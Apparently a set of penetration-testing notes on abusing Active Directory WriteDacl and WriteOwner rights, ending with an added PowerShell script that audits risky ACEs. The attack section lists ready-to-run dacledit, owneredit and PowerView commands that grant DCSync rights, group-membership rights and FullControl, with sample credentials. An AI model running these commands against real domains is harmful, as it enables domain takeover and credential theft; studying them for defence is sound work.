Granting Rights and Ownership
Permissions such as WriteDacl and Ownership play a crucial role in controlling access to objects and ensuring their security. The WriteDacl access right is the privilege that allows an account to modify the DACL of a target object. Ownership, on the other hand, denotes the state of possessing administrative control over an object. Understanding the significance of these access rights is essential, as they determine how vulnerable an object becomes, and which abuses are possible, once its DACL is manipulated.
If we possess an account with privileges to modify a target object's DACL, we can use that account to edit the target's DACL and make it vulnerable to other attacks.
WriteDacl
Once we find an account with WriteDacl or Ownership over another object, we can modify that object's DACL to, for example, grant DCSync permissions over the entire domain:
dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose
Another option is to grant ourselves the right to add members to a group (dacledit's WriteMembers right, which the original command left out):
dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights WriteMembers
Now we can add ourselves or another user to the group, as described in the AddMembers section.
WriteOwner
This right allows us to modify the owner of the target object, specifically the OwnerSid sub-attribute within the object's security descriptor.
BloodHound Cypher query to list users holding WriteOwner over any object:
MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p
With this kind of right we can perform a GPO attack. Specifically, we can abuse WriteOwner with owneredit to make ourselves the owner of the target:
owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
Usually this step is followed by changing the DACL of the target user to grant the new owner something like FullControl:
dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!'
From Windows we can do the same with PowerView:
Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose
Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose
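As an added defensive example (not part of the original notes), the PowerShell audit below walks the DACLs of users, groups and the domain root and reports which principals own an object or hold WriteDacl, WriteOwner, GenericAll or the DS-Replication extended rights that make DCSync possible, so the rights discussed above can be reviewed and removed before they are abused. It assumes the RSAT ActiveDirectory module; the allow-list of expected principals is constructed and must be adjusted per domain.

```powershell
# Added audit example, not from the original notes. Assumes the RSAT
# ActiveDirectory module; the allow-list is constructed and must be
# adjusted for the domain under review.
Import-Module ActiveDirectory
# Constructed allow-list of principals expected to own objects or hold
# WriteDacl / WriteOwner / GenericAll / replication rights on them.
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators',
    "$env:USERDOMAIN\Domain Admins",
    "$env:USERDOMAIN\Enterprise Admins",
    "$env:USERDOMAIN\Domain Controllers"
)
# Rights discussed on this page, plus GenericAll, which implies both.
$RiskyRights = [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl -bor
               [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner -bor
               [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$ExtendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
# Extended-right GUIDs for DS-Replication-Get-Changes and -All (DCSync).
$ReplicationGuids = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',
                      '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')
function Find-RiskyAce {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    $filter = '(|(objectClass=user)(objectClass=group)(objectClass=domainDNS))'
    foreach ($obj in Get-ADObject -SearchBase $SearchBase -LDAPFilter $filter) {
        $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"
        # The owner can always rewrite the DACL, so an unexpected owner is a finding.
        if ($ExpectedPrincipals -notcontains $acl.Owner) {
            [pscustomobject]@{ Object = $obj.DistinguishedName; Principal = $acl.Owner
                               Finding = 'Owner'; Inherited = $false }
        }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if ($ExpectedPrincipals -contains $who) { continue }
            $hit = [int]($ace.ActiveDirectoryRights -band $RiskyRights)
            $isDcSync = ([int]($ace.ActiveDirectoryRights -band $ExtendedRight) -ne 0) -and
                        ($ReplicationGuids -contains $ace.ObjectType.ToString())
            if ($hit -eq 0 -and -not $isDcSync) { continue }
            if ($isDcSync) { $finding = 'DCSync' }
            else { $finding = [System.DirectoryServices.ActiveDirectoryRights]$hit }
            [pscustomobject]@{ Object = $obj.DistinguishedName; Principal = $who
                               Finding = $finding; Inherited = $ace.IsInherited }
        }
    }
}
Find-RiskyAce | Format-Table -AutoSize
```

Inherited ACEs usually come from the parent OU or the domain root, so a hit with Inherited set to True is best fixed at the container rather than on the individual object.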